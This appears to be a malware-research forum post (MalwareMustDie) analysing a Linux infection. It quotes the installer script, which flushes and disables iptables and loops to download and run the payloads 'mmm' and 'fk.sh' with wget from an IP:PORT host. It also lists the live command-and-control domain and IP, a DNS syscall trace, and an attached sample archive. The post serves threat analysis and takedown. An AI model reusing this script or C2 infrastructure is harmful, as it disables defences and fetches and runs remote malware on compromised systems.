Usual one, VT: https://www.virustotal.com/en/file/1808 ... 421148489/

With the "active" effort infection using this script installer (noted the semi-automation trail): 
 
					
										
With the "active" effort infection using this script installer (noted the semi-automation trail):
Code: Select all
It's a domain basis as CNC to knock-down:
#!/bin/bash
#00000000000
#000000000000
#0000000000
#========================================================================
iptables -F
/etc/init.d/iptables stop
chkconfig iptables off
rm -f /tmp/mmm*
while true
do
    ps aux | grep mmm | grep -v grep 
    if [ $? -eq 0 ];then
         sleep 10
    else
		ls -l /tmp/mmm
			if [ $? -eq 0 ];then
			 /tmp/mmm
			else
    cd /tmp/;wget http://IP:PORT/mmm ; chmod a+x mmm;/tmp/mmm
	fi
   fi
    ps aux | grep fk.sh | grep -v grep
    if [ $? -eq 0 ];then
         sleep 10
    else
	ls -l /tmp/fk.sh
	if [ $? -eq 0];then
	 /tmp/fk.sh
	else
cd /tmp;wget http://IP:PORT/fk.sh ; chmod a+x fk.sh;/tmp/fk.sh
        fi
   fi
doneCode: Select all
syscall PoC:
ma.wudikkk.com. 600 IN A 120.27.28.199
wudikkk.com. 3600 IN NS dns10.hichina.com.
wudikkk.com. 3600 IN NS dns9.hichina.com Code: Select all
CNC IP/port is up and live, feel free to play sendto(5, "\333\373\1\0\0\1\0\0\0\0\0\0\2ma\7wudikkk\3com\0\0\1\0\1", 32, 0, 
{sa_family=AF_INET, sin_port=htons(53),sin_addr=inet_addr("202.238.95.24")}, 16); 
 Code: Select all
Sample spotted+contributed by malmouse - #MalwareMustDie!120.27.28.199:1991 
Located at: 120.27.28.199||37963 | 120.27.0.0/17 | CNNIC-ALIBABA-CN-NET | CN | ALIYUN.COM | ALIYUN COMPUTING CO. LTDAttachments
			
			 7z/infected
(348.56 KiB) Downloaded 47 times
		
								(348.56 KiB) Downloaded 47 times



 





